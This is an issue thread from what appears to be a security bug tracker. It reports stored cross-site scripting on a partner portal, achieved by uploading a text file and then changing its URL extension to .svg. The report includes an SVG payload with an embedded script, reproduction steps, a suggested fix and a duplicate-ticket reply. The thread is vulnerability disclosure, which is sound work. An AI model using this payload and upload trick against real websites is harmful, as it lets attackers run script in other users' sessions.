### ISSUE TITLE
SEC-4354 XSS via file extension change

### ISSUE THREAD

**Issue by prashantjadhav92** [MindMatrix/SecurityTracker#58]
XSS via file extension change

Steps to reproduce:
1. Login in go to /#gallery/documents/assets
2. Upload text file with the following payload:
3. 
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.domain);
  </script>
</svg>

4. Open text file URL and change extension, e.g. https://partners.acronis.com/file/ccweldtavhlnc/svg.svg
The same might be possible with pdf extension

Fix: whitelist allowed extensions. Whenever possible, it is better to force browser to download file via  Content-Disposition response header

**Comment by PuneetRevclerx** [comment]
@prashantjadhav92 sir, It's a duplicate issue of #141. As in both the tickets we are uploading a text file and then changing it's extension to svg.
